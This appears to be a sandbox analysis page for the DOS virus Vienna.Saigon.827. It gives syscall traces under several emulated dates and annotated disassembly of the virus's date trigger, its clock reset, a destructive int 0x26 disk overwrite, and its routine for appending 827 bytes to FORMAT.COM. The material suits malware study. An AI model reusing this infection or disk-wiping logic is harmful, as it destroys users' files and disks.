Sample viewer

vx.netlux.org/Virus.DOS.Vienna.Saigon.827


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:15:20.097758193Z 255 PC: 12a6d | UNKNOWN!
2018-12-17T22:15:20.099107584Z 42 PC: 12a7a | Get date 0x12a7a: cmp cx, 0x7c9
; Listing starts at the return address of the Get date call and runs in address order,
; so both branch targets are shown, not only the path this run executed.
; int 21h/AH=2Ah returns CX=year, DH=month, DL=day; 0x7c9 = 1993.
0x12a7e: jb 0x12a9a  ; year < 1993 -> year-1990 handling at 0x12a9a
0x12a80: jge 0x12a85  ; otherwise re-read the date at 0x12a85
0x12a82: jmp 0x12ae0  ; fallback: skip the date logic
0x12a84: nop
0x12a85: mov ah, 0x2a  ; AH=2Ah: DOS Get date
0x12a87: nop
0x12a88: int 0x21
0x12a8a: cmp dh, 5  ; month >= 5 ?
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0  ; earlier month: no trigger
0x12a91: nop
0x12a92: cmp dl, 0xd  ; day >= 13 ?
0x12a95: jge 0x12ab8  ; yes -> 0x12ab8 (outside this excerpt)
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a9e: je 0x12aad  ; already 1990: skip the clock rewrite
0x12aa0: mov ah, 0x2b  ; AH=2Bh: DOS Set date
0x12aa2: mov cx, 0x7c6  ; new year = 1990; the excerpt ends before the int 0x21
2018-12-17T22:15:20.101745346Z 42 PC: 12a8a | Get date 0x12a8a: cmp dh, 5
; Listing from the return address of the Get date call at 0x12a88 (DH=month, DL=day), in address order.
; NOTE(review): no emulated-clock JSON row precedes this run; the Display string row that follows
; would fit the wall-clock date in the timestamps (month >= 5, day >= 13). Confirm.
0x12a8d: jge 0x12a92  ; month >= 5 -> check the day
0x12a8f: jmp 0x12ae0  ; otherwise skip the trigger
0x12a91: nop
0x12a92: cmp dl, 0xd  ; day >= 13 ?
0x12a95: jge 0x12ab8  ; yes -> 0x12ab8 (outside this excerpt)
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6  ; year == 1990 (0x7c6) ?
0x12a9e: je 0x12aad  ; yes: leave the clock alone
0x12aa0: mov ah, 0x2b  ; AH=2Bh: DOS Set date ...
0x12aa2: mov cx, 0x7c6  ; ... with the year forced to 1990
0x12aa5: int 0x21
0x12aa7: mov ah, 0x2d  ; AH=2Dh: DOS Set time ...
0x12aa9: mov cl, 1  ; ... with minutes = 1
0x12aab: int 0x21
0x12aad: mov ah, 0x2c  ; AH=2Ch: DOS Get time (CL = minutes)
0x12aaf: int 0x21
0x12ab1: cmp cl, 0xf  ; minutes >= 15 ?
0x12ab4: jae 0x12ac2  ; yes -> 0x12ac2 (outside this excerpt)
2018-12-17T22:15:20.103838199Z 9 PC: 12ac2 | Display string (String= ' Saigon will never fall!.. ')
2018-12-17T22:15:20.109603653Z 47 PC: 12ae5 | Get disk transfer address
2018-12-17T22:15:20.111863963Z 26 PC: 12af8 | Set disk transfer address
2018-12-17T22:15:20.113577755Z 78 PC: 12b85 | Find first file
2018-12-17T22:15:20.119723889Z 79 PC: 12b8b | Find next file
2018-12-17T22:15:20.125245605Z 79 PC: 12b8b | Find next file
2018-12-17T22:15:20.128021048Z 79 PC: 12b8b | Find next file
2018-12-17T22:15:20.130699862Z 79 PC: 12b8b | Find next file
2018-12-17T22:15:20.13397163Z 79 PC: 12b8b | Find next file
2018-12-17T22:15:20.136563657Z 79 PC: 12b8b | Find next file
2018-12-17T22:15:20.139345174Z 79 PC: 12b8b | Find next file
2018-12-17T22:15:20.14324923Z 79 PC: 12b8b | Find next file
2018-12-17T22:15:20.145957486Z 78 PC: 12b85 | Find first file
2018-12-17T22:15:20.155199352Z 79 PC: 12b8b | Find next file
2018-12-17T22:15:20.158675451Z 67 PC: 12bc4 | Get or set file attributes
2018-12-17T22:15:20.164549001Z 67 PC: 12bd6 | Get or set file attributes
2018-12-17T22:15:20.510792324Z 61 PC: 12be1 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-17T22:15:20.517924167Z 87 PC: 12bed | Get or set file date and time
2018-12-17T22:15:20.523280829Z 44 PC: 12bf9 | Get time 0x12bf9: mov ah, 0x3f
; Listing from the return address of the Get time call, in address order: start of the file-modification
; sequence. The rows after it show a 3-byte read, an 827-byte write and a 3-byte write on the handle
; opened for C:\DOS\FORMAT.COM.
0x12bfb: mov cx, 3  ; AH=3Fh read, CX = 3 bytes
0x12bfe: mov dx, 0x69
0x12c01: nop
0x12c02: add dx, si  ; DS:DX = si + 0x69: buffer for the file's first 3 bytes
0x12c04: int 0x21
0x12c06: jb 0x12c5e  ; CF set (error) -> 0x12c5e, the address the trace shows just after the 3-byte write
0x12c08: cmp ax, 3
0x12c0b: jne 0x12c5e  ; short read -> same exit
0x12c0d: mov ax, 0x4202  ; AH=42h, AL=2: seek relative to end of file
0x12c10: mov cx, 0
0x12c13: mov dx, 0  ; offset CX:DX = 0, so AX returns the file length (low word)
0x12c16: int 0x21
0x12c18: jb 0x12c5e
0x12c1a: mov cx, ax
0x12c1c: sub ax, 3
0x12c1f: mov word ptr [si + 0x6d], ax  ; stores length - 3; presumably the displacement for a 3-byte jump to the appended code (confirm)
0x12c22: nop
0x12c23: add cx, 0x352  ; cx = length + 0x352 (850)
0x12c27: mov di, si
2018-12-17T22:15:20.526200505Z 63 PC: 12c06 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:15:20.532072749Z 66 PC: 12c18 | Move file pointer
2018-12-17T22:15:20.534224451Z 64 PC: 12c3d | Write file or device (Write 827 bytes on handle 5)
2018-12-17T22:15:20.541889346Z 66 PC: 12c4f | Move file pointer
2018-12-17T22:15:20.554341062Z 64 PC: 12c5e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:15:20.557573448Z 87 PC: 12c71 | Get or set file date and time
2018-12-17T22:15:20.559398673Z 62 PC: 12c75 | Close file
2018-12-17T22:15:20.566271112Z 67 PC: 12c84 | Get or set file attributes
2018-12-17T22:15:20.577574129Z 26 PC: 12c91 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2816,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:32.961221791Z 255 PC: 12a6d | UNKNOWN!
2018-12-25T11:46:32.966544622Z 42 PC: 12a7a | Get date 0x12a7a: cmp cx, 0x7c9
; Listing starts at the return address of the Get date call and runs in address order,
; so both branch targets are shown, not only the path this run executed.
; int 21h/AH=2Ah returns CX=year, DH=month, DL=day; 0x7c9 = 1993.
; NOTE(review): the JSON row printed above this run gives Year 1980, which would take jb -> 0x12a9a;
; the Set date / Set time rows that follow fit that. Confirm the JSON is this run's emulated clock.
0x12a7e: jb 0x12a9a  ; year < 1993 -> year-1990 handling at 0x12a9a
0x12a80: jge 0x12a85  ; otherwise re-read the date at 0x12a85
0x12a82: jmp 0x12ae0  ; fallback: skip the date logic
0x12a84: nop
0x12a85: mov ah, 0x2a  ; AH=2Ah: DOS Get date
0x12a87: nop
0x12a88: int 0x21
0x12a8a: cmp dh, 5  ; month >= 5 ?
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0  ; earlier month: no trigger
0x12a91: nop
0x12a92: cmp dl, 0xd  ; day >= 13 ?
0x12a95: jge 0x12ab8  ; yes -> 0x12ab8 (outside this excerpt)
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a9e: je 0x12aad  ; already 1990: skip the clock rewrite
0x12aa0: mov ah, 0x2b  ; AH=2Bh: DOS Set date
0x12aa2: mov cx, 0x7c6  ; new year = 1990; the excerpt ends before the int 0x21
2018-12-25T11:46:32.969116346Z 43 PC: 12aa7 | Set date
2018-12-25T11:46:32.97270307Z 45 PC: 12aad | Set time
2018-12-25T11:46:32.976793608Z 44 PC: 12ab1 | Get time 0x12ab1: cmp cl, 0xf
; Listing from the return address of the Get time call (CL = minutes), in address order.
; The next trace row is Get date at 12a8a, which indicates the jmp 0x12a85 path in this run.
; NOTE(review): this table contains no int 0x26 rows (it seems to log int 21h functions only),
; so the trace alone cannot show whether the disk write below ever ran.
0x12ab4: jae 0x12ac2  ; minutes >= 15 -> disk-write path at 0x12ac2
0x12ab6: jmp 0x12a85  ; otherwise loop back to the Get date at 0x12a85
0x12ab8: mov ah, 9  ; AH=09h: DOS Display string (target of the day >= 13 branch)
0x12aba: mov dx, si
0x12abc: add dx, 0x41  ; DS:DX = si + 0x41 (string address)
0x12abf: nop
0x12ac0: int 0x21  ; execution then falls through into 0x12ac2
0x12ac2: cmp byte ptr [si], 0x1a  ; presumably a drive number held at [si]; confirm
0x12ac5: nop
0x12ac6: nop
0x12ac7: ja 0x12ae0  ; above 0x1a: skip the disk write
0x12ac9: pushf
0x12aca: mov al, byte ptr [si]  ; AL = drive for int 26h
0x12acc: nop
0x12acd: nop
0x12ace: mov cx, 0x100  ; CX = 0x100 sectors
0x12ad1: mov dx, 0  ; DX = first logical sector 0
0x12ad4: mov bx, 1  ; DS:BX = source buffer
0x12ad7: int 0x26  ; DOS absolute disk write: destructive payload, overwrites the start of the volume
2018-12-25T11:46:32.979131727Z 42 PC: 12a8a | Get date 0x12a8a: cmp dh, 5
; Listing from the return address of the Get date call at 0x12a88 (DH=month, DL=day), in address order.
0x12a8d: jge 0x12a92  ; month >= 5 -> check the day
0x12a8f: jmp 0x12ae0  ; otherwise skip the trigger
0x12a91: nop
0x12a92: cmp dl, 0xd  ; day >= 13 ?
0x12a95: jge 0x12ab8  ; yes -> 0x12ab8 (outside this excerpt)
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6  ; year == 1990 (0x7c6) ?
0x12a9e: je 0x12aad  ; yes: leave the clock alone
0x12aa0: mov ah, 0x2b  ; AH=2Bh: DOS Set date ...
0x12aa2: mov cx, 0x7c6  ; ... with the year forced to 1990
0x12aa5: int 0x21
0x12aa7: mov ah, 0x2d  ; AH=2Dh: DOS Set time ...
0x12aa9: mov cl, 1  ; ... with minutes = 1
0x12aab: int 0x21
0x12aad: mov ah, 0x2c  ; AH=2Ch: DOS Get time (CL = minutes)
0x12aaf: int 0x21
0x12ab1: cmp cl, 0xf  ; minutes >= 15 ?
0x12ab4: jae 0x12ac2  ; yes -> 0x12ac2 (outside this excerpt)
2018-12-25T11:46:32.981738183Z 47 PC: 12ae5 | Get disk transfer address
2018-12-25T11:46:32.986952014Z 26 PC: 12af8 | Set disk transfer address
2018-12-25T11:46:32.991362826Z 78 PC: 12b85 | Find first file
2018-12-25T11:46:33.005830728Z 79 PC: 12b8b | Find next file
2018-12-25T11:46:33.016457767Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.023046951Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.028447834Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.031270158Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.035137201Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.037923133Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.040729221Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.044408283Z 78 PC: 12b85 | Find first file (See above)
2018-12-25T11:46:33.053169014Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.056493746Z 67 PC: 12bc4 | Get or set file attributes
2018-12-25T11:46:33.063723342Z 67 PC: 12bd6 | Get or set file attributes
2018-12-25T11:46:34.054123986Z 61 PC: 12be1 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:46:34.061109722Z 87 PC: 12bed | Get or set file date and time
2018-12-25T11:46:34.06293456Z 44 PC: 12bf9 | Get time 0x12bf9: mov ah, 0x3f
; Listing from the return address of the Get time call, in address order: start of the file-modification
; sequence. The rows after it show a 3-byte read, an 827-byte write and a 3-byte write on the handle
; opened for C:\DOS\FORMAT.COM.
0x12bfb: mov cx, 3  ; AH=3Fh read, CX = 3 bytes
0x12bfe: mov dx, 0x69
0x12c01: nop
0x12c02: add dx, si  ; DS:DX = si + 0x69: buffer for the file's first 3 bytes
0x12c04: int 0x21
0x12c06: jb 0x12c5e  ; CF set (error) -> 0x12c5e, the address the trace shows just after the 3-byte write
0x12c08: cmp ax, 3
0x12c0b: jne 0x12c5e  ; short read -> same exit
0x12c0d: mov ax, 0x4202  ; AH=42h, AL=2: seek relative to end of file
0x12c10: mov cx, 0
0x12c13: mov dx, 0  ; offset CX:DX = 0, so AX returns the file length (low word)
0x12c16: int 0x21
0x12c18: jb 0x12c5e
0x12c1a: mov cx, ax
0x12c1c: sub ax, 3
0x12c1f: mov word ptr [si + 0x6d], ax  ; stores length - 3; presumably the displacement for a 3-byte jump to the appended code (confirm)
0x12c22: nop
0x12c23: add cx, 0x352  ; cx = length + 0x352 (850)
0x12c27: mov di, si
2018-12-25T11:46:34.079544283Z 63 PC: 12c06 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:34.085733832Z 66 PC: 12c18 | Move file pointer
2018-12-25T11:46:34.088003962Z 64 PC: 12c3d | Write file or device (Write 827 bytes on handle 5)
2018-12-25T11:46:34.095979718Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:46:34.097331457Z 64 PC: 12c5e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:34.100142995Z 87 PC: 12c71 | Get or set file date and time
2018-12-25T11:46:34.102377831Z 62 PC: 12c75 | Close file
2018-12-25T11:46:34.108922257Z 67 PC: 12c84 | Get or set file attributes
2018-12-25T11:46:34.118797068Z 26 PC: 12c91 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1990,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2816,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:33.032653481Z 255 PC: 12a6d | UNKNOWN!
2018-12-25T11:46:33.034611925Z 42 PC: 12a7a | Get date 0x12a7a: cmp cx, 0x7c9
; Listing starts at the return address of the Get date call and runs in address order,
; so both branch targets are shown, not only the path this run executed.
; int 21h/AH=2Ah returns CX=year, DH=month, DL=day; 0x7c9 = 1993.
; NOTE(review): the JSON row printed above this run gives Year 1990, which would take je 0x12aad and
; skip the clock rewrite; the next row is Get time with no Set date / Set time rows, which fits.
; Confirm the JSON is this run's emulated clock.
0x12a7e: jb 0x12a9a  ; year < 1993 -> year-1990 handling at 0x12a9a
0x12a80: jge 0x12a85  ; otherwise re-read the date at 0x12a85
0x12a82: jmp 0x12ae0  ; fallback: skip the date logic
0x12a84: nop
0x12a85: mov ah, 0x2a  ; AH=2Ah: DOS Get date
0x12a87: nop
0x12a88: int 0x21
0x12a8a: cmp dh, 5  ; month >= 5 ?
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0  ; earlier month: no trigger
0x12a91: nop
0x12a92: cmp dl, 0xd  ; day >= 13 ?
0x12a95: jge 0x12ab8  ; yes -> 0x12ab8 (outside this excerpt)
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a9e: je 0x12aad  ; already 1990: skip the clock rewrite
0x12aa0: mov ah, 0x2b  ; AH=2Bh: DOS Set date
0x12aa2: mov cx, 0x7c6  ; new year = 1990; the excerpt ends before the int 0x21
2018-12-25T11:46:33.036949566Z 44 PC: 12ab1 | Get time 0x12ab1: cmp cl, 0xf
; Listing from the return address of the Get time call (CL = minutes), in address order.
; NOTE(review): in this run the next row is Get disk transfer address, with no second Get date row,
; so jmp 0x12a85 was apparently not taken; that would mean jae 0x12ac2 was. The table contains no
; int 0x26 rows (it seems to log int 21h functions only), so what happened at 0x12ac2 is not visible
; here. Confirm from the emulated disk state.
0x12ab4: jae 0x12ac2  ; minutes >= 15 -> disk-write path at 0x12ac2
0x12ab6: jmp 0x12a85  ; otherwise loop back to the Get date at 0x12a85
0x12ab8: mov ah, 9  ; AH=09h: DOS Display string (target of the day >= 13 branch)
0x12aba: mov dx, si
0x12abc: add dx, 0x41  ; DS:DX = si + 0x41 (string address)
0x12abf: nop
0x12ac0: int 0x21  ; execution then falls through into 0x12ac2
0x12ac2: cmp byte ptr [si], 0x1a  ; presumably a drive number held at [si]; confirm
0x12ac5: nop
0x12ac6: nop
0x12ac7: ja 0x12ae0  ; above 0x1a: skip the disk write
0x12ac9: pushf
0x12aca: mov al, byte ptr [si]  ; AL = drive for int 26h
0x12acc: nop
0x12acd: nop
0x12ace: mov cx, 0x100  ; CX = 0x100 sectors
0x12ad1: mov dx, 0  ; DX = first logical sector 0
0x12ad4: mov bx, 1  ; DS:BX = source buffer
0x12ad7: int 0x26  ; DOS absolute disk write: destructive payload, overwrites the start of the volume
2018-12-25T11:46:33.039918186Z 47 PC: 12ae5 | Get disk transfer address
2018-12-25T11:46:33.0414339Z 26 PC: 12af8 | Set disk transfer address
2018-12-25T11:46:33.043913471Z 78 PC: 12b85 | Find first file
2018-12-25T11:46:33.050691237Z 79 PC: 12b8b | Find next file
2018-12-25T11:46:33.053348886Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.057359936Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.060568012Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.063854558Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.06757829Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.07088033Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.074134223Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.077608673Z 78 PC: 12b85 | Find first file (See above)
2018-12-25T11:46:33.084611456Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.086902922Z 67 PC: 12bc4 | Get or set file attributes
2018-12-25T11:46:33.092621822Z 67 PC: 12bd6 | Get or set file attributes
2018-12-25T11:46:33.430881703Z 61 PC: 12be1 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:46:33.438817676Z 87 PC: 12bed | Get or set file date and time
2018-12-25T11:46:33.441395012Z 44 PC: 12bf9 | Get time 0x12bf9: mov ah, 0x3f
; Listing from the return address of the Get time call, in address order: start of the file-modification
; sequence. The rows after it show a 3-byte read, an 827-byte write and a 3-byte write on the handle
; opened for C:\DOS\FORMAT.COM.
0x12bfb: mov cx, 3  ; AH=3Fh read, CX = 3 bytes
0x12bfe: mov dx, 0x69
0x12c01: nop
0x12c02: add dx, si  ; DS:DX = si + 0x69: buffer for the file's first 3 bytes
0x12c04: int 0x21
0x12c06: jb 0x12c5e  ; CF set (error) -> 0x12c5e, the address the trace shows just after the 3-byte write
0x12c08: cmp ax, 3
0x12c0b: jne 0x12c5e  ; short read -> same exit
0x12c0d: mov ax, 0x4202  ; AH=42h, AL=2: seek relative to end of file
0x12c10: mov cx, 0
0x12c13: mov dx, 0  ; offset CX:DX = 0, so AX returns the file length (low word)
0x12c16: int 0x21
0x12c18: jb 0x12c5e
0x12c1a: mov cx, ax
0x12c1c: sub ax, 3
0x12c1f: mov word ptr [si + 0x6d], ax  ; stores length - 3; presumably the displacement for a 3-byte jump to the appended code (confirm)
0x12c22: nop
0x12c23: add cx, 0x352  ; cx = length + 0x352 (850)
0x12c27: mov di, si
2018-12-25T11:46:33.445647163Z 63 PC: 12c06 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:33.452319055Z 66 PC: 12c18 | Move file pointer
2018-12-25T11:46:33.454312562Z 64 PC: 12c3d | Write file or device (Write 827 bytes on handle 5)
2018-12-25T11:46:33.464166469Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:46:33.465693783Z 64 PC: 12c5e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:33.468782413Z 87 PC: 12c71 | Get or set file date and time
2018-12-25T11:46:33.471154498Z 62 PC: 12c75 | Close file
2018-12-25T11:46:33.478463668Z 67 PC: 12c84 | Get or set file attributes
2018-12-25T11:46:33.489579983Z 26 PC: 12c91 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1993,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2816,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:33.042197184Z 255 PC: 12a6d | UNKNOWN!
2018-12-25T11:46:33.044013896Z 42 PC: 12a7a | Get date 0x12a7a: cmp cx, 0x7c9
; Listing starts at the return address of the Get date call and runs in address order,
; so both branch targets are shown, not only the path this run executed.
; int 21h/AH=2Ah returns CX=year, DH=month, DL=day; 0x7c9 = 1993.
; NOTE(review): the JSON row printed above this run gives Year 1993, which would take jge 0x12a85;
; the next row is the Get date at 12a8a, which fits. Confirm the JSON is this run's emulated clock.
0x12a7e: jb 0x12a9a  ; year < 1993 -> year-1990 handling at 0x12a9a
0x12a80: jge 0x12a85  ; otherwise re-read the date at 0x12a85
0x12a82: jmp 0x12ae0  ; fallback: skip the date logic
0x12a84: nop
0x12a85: mov ah, 0x2a  ; AH=2Ah: DOS Get date
0x12a87: nop
0x12a88: int 0x21
0x12a8a: cmp dh, 5  ; month >= 5 ?
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0  ; earlier month: no trigger
0x12a91: nop
0x12a92: cmp dl, 0xd  ; day >= 13 ?
0x12a95: jge 0x12ab8  ; yes -> 0x12ab8 (outside this excerpt)
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a9e: je 0x12aad  ; already 1990: skip the clock rewrite
0x12aa0: mov ah, 0x2b  ; AH=2Bh: DOS Set date
0x12aa2: mov cx, 0x7c6  ; new year = 1990; the excerpt ends before the int 0x21
2018-12-25T11:46:33.054944304Z 42 PC: 12a8a | Get date 0x12a8a: cmp dh, 5
; Listing from the return address of the Get date call at 0x12a88 (DH=month, DL=day), in address order.
; The next trace row is Get disk transfer address, with no Display string row in this run.
0x12a8d: jge 0x12a92  ; month >= 5 -> check the day
0x12a8f: jmp 0x12ae0  ; otherwise skip the trigger
0x12a91: nop
0x12a92: cmp dl, 0xd  ; day >= 13 ?
0x12a95: jge 0x12ab8  ; yes -> 0x12ab8 (outside this excerpt)
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6  ; year == 1990 (0x7c6) ?
0x12a9e: je 0x12aad  ; yes: leave the clock alone
0x12aa0: mov ah, 0x2b  ; AH=2Bh: DOS Set date ...
0x12aa2: mov cx, 0x7c6  ; ... with the year forced to 1990
0x12aa5: int 0x21
0x12aa7: mov ah, 0x2d  ; AH=2Dh: DOS Set time ...
0x12aa9: mov cl, 1  ; ... with minutes = 1
0x12aab: int 0x21
0x12aad: mov ah, 0x2c  ; AH=2Ch: DOS Get time (CL = minutes)
0x12aaf: int 0x21
0x12ab1: cmp cl, 0xf  ; minutes >= 15 ?
0x12ab4: jae 0x12ac2  ; yes -> 0x12ac2 (outside this excerpt)
2018-12-25T11:46:33.057128134Z 47 PC: 12ae5 | Get disk transfer address
2018-12-25T11:46:33.059241554Z 26 PC: 12af8 | Set disk transfer address
2018-12-25T11:46:33.060816486Z 78 PC: 12b85 | Find first file
2018-12-25T11:46:33.07379458Z 79 PC: 12b8b | Find next file
2018-12-25T11:46:33.078420762Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.08838596Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.091186819Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.094897452Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.098690774Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.101463644Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.104369252Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.108037733Z 78 PC: 12b85 | Find first file (See above)
2018-12-25T11:46:33.121257578Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.12434228Z 67 PC: 12bc4 | Get or set file attributes
2018-12-25T11:46:33.131430817Z 67 PC: 12bd6 | Get or set file attributes
2018-12-25T11:46:34.054128751Z 61 PC: 12be1 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:46:34.070382426Z 87 PC: 12bed | Get or set file date and time
2018-12-25T11:46:34.073040833Z 44 PC: 12bf9 | Get time 0x12bf9: mov ah, 0x3f
; Listing from the return address of the Get time call, in address order: start of the file-modification
; sequence. The rows after it show a 3-byte read, an 827-byte write and a 3-byte write on the handle
; opened for C:\DOS\FORMAT.COM.
0x12bfb: mov cx, 3  ; AH=3Fh read, CX = 3 bytes
0x12bfe: mov dx, 0x69
0x12c01: nop
0x12c02: add dx, si  ; DS:DX = si + 0x69: buffer for the file's first 3 bytes
0x12c04: int 0x21
0x12c06: jb 0x12c5e  ; CF set (error) -> 0x12c5e, the address the trace shows just after the 3-byte write
0x12c08: cmp ax, 3
0x12c0b: jne 0x12c5e  ; short read -> same exit
0x12c0d: mov ax, 0x4202  ; AH=42h, AL=2: seek relative to end of file
0x12c10: mov cx, 0
0x12c13: mov dx, 0  ; offset CX:DX = 0, so AX returns the file length (low word)
0x12c16: int 0x21
0x12c18: jb 0x12c5e
0x12c1a: mov cx, ax
0x12c1c: sub ax, 3
0x12c1f: mov word ptr [si + 0x6d], ax  ; stores length - 3; presumably the displacement for a 3-byte jump to the appended code (confirm)
0x12c22: nop
0x12c23: add cx, 0x352  ; cx = length + 0x352 (850)
0x12c27: mov di, si
2018-12-25T11:46:34.075664877Z 63 PC: 12c06 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:34.081405608Z 66 PC: 12c18 | Move file pointer
2018-12-25T11:46:34.083496719Z 64 PC: 12c3d | Write file or device (Write 827 bytes on handle 5)
2018-12-25T11:46:34.091642809Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:46:34.093294208Z 64 PC: 12c5e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:34.096593335Z 87 PC: 12c71 | Get or set file date and time
2018-12-25T11:46:34.098621097Z 62 PC: 12c75 | Close file
2018-12-25T11:46:34.105150405Z 67 PC: 12c84 | Get or set file attributes
2018-12-25T11:46:34.114911036Z 26 PC: 12c91 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":5,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2816,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:33.443793924Z 255 PC: 12a6d | UNKNOWN!
2018-12-25T11:46:33.445437313Z 42 PC: 12a7a | Get date 0x12a7a: cmp cx, 0x7c9
; Listing starts at the return address of the Get date call and runs in address order,
; so both branch targets are shown, not only the path this run executed.
; int 21h/AH=2Ah returns CX=year, DH=month, DL=day; 0x7c9 = 1993.
; NOTE(review): the JSON row printed above this run gives Year 1980, Month 5, Day 1: jb -> 0x12a9a and
; the Set date path (those rows follow), with the day below 13, so no Display string row is expected
; and none appears. Confirm the JSON is this run's emulated clock.
0x12a7e: jb 0x12a9a  ; year < 1993 -> year-1990 handling at 0x12a9a
0x12a80: jge 0x12a85  ; otherwise re-read the date at 0x12a85
0x12a82: jmp 0x12ae0  ; fallback: skip the date logic
0x12a84: nop
0x12a85: mov ah, 0x2a  ; AH=2Ah: DOS Get date
0x12a87: nop
0x12a88: int 0x21
0x12a8a: cmp dh, 5  ; month >= 5 ?
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0  ; earlier month: no trigger
0x12a91: nop
0x12a92: cmp dl, 0xd  ; day >= 13 ?
0x12a95: jge 0x12ab8  ; yes -> 0x12ab8 (outside this excerpt)
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6  ; 0x7c6 = 1990
0x12a9e: je 0x12aad  ; already 1990: skip the clock rewrite
0x12aa0: mov ah, 0x2b  ; AH=2Bh: DOS Set date
0x12aa2: mov cx, 0x7c6  ; new year = 1990; the excerpt ends before the int 0x21
2018-12-25T11:46:33.447430989Z 43 PC: 12aa7 | Set date
2018-12-25T11:46:33.450432942Z 45 PC: 12aad | Set time
2018-12-25T11:46:33.453422176Z 44 PC: 12ab1 | Get time 0x12ab1: cmp cl, 0xf
; Listing from the return address of the Get time call (CL = minutes), in address order.
; The next trace row is Get date at 12a8a, which indicates the jmp 0x12a85 path in this run.
; NOTE(review): this table contains no int 0x26 rows (it seems to log int 21h functions only),
; so the trace alone cannot show whether the disk write below ever ran.
0x12ab4: jae 0x12ac2  ; minutes >= 15 -> disk-write path at 0x12ac2
0x12ab6: jmp 0x12a85  ; otherwise loop back to the Get date at 0x12a85
0x12ab8: mov ah, 9  ; AH=09h: DOS Display string (target of the day >= 13 branch)
0x12aba: mov dx, si
0x12abc: add dx, 0x41  ; DS:DX = si + 0x41 (string address)
0x12abf: nop
0x12ac0: int 0x21  ; execution then falls through into 0x12ac2
0x12ac2: cmp byte ptr [si], 0x1a  ; presumably a drive number held at [si]; confirm
0x12ac5: nop
0x12ac6: nop
0x12ac7: ja 0x12ae0  ; above 0x1a: skip the disk write
0x12ac9: pushf
0x12aca: mov al, byte ptr [si]  ; AL = drive for int 26h
0x12acc: nop
0x12acd: nop
0x12ace: mov cx, 0x100  ; CX = 0x100 sectors
0x12ad1: mov dx, 0  ; DX = first logical sector 0
0x12ad4: mov bx, 1  ; DS:BX = source buffer
0x12ad7: int 0x26  ; DOS absolute disk write: destructive payload, overwrites the start of the volume
